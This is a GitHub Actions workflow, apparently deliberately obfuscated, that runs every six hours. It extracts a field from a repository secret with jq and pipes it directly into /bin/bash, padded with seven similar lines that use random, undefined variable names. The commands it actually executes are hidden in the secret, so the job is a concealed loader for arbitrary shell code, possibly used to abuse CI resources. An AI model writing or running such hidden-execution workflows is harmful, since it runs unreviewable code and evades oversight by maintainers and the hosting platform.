name: yanlaiyanfan
on:
  workflow_dispatch:
  schedule:
    - cron: '28 0/6 * * *'

jobs:  # 19731
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yanlaiyanfan
        env:
          m16: ${{ secrets.m16 }}
        run: |
          echo $m16 | jq -r .mpjyh46 | /bin/bash
          echo $zgp770 | jq -r .iw29967 | /bin/bash
          echo $xi36 | jq -r .i50 | /bin/bash
          echo $jvoo5587 | jq -r .wxt93 | /bin/bash
          echo $qwk3462 | jq -r .yrhm22117 | /bin/bash
          echo $rbtoc2310 | jq -r .wecu9918 | /bin/bash
          echo $im605 | jq -r .zsdq254 | /bin/bash
          echo $xjp89519 | jq -r .ui24 | /bin/bash

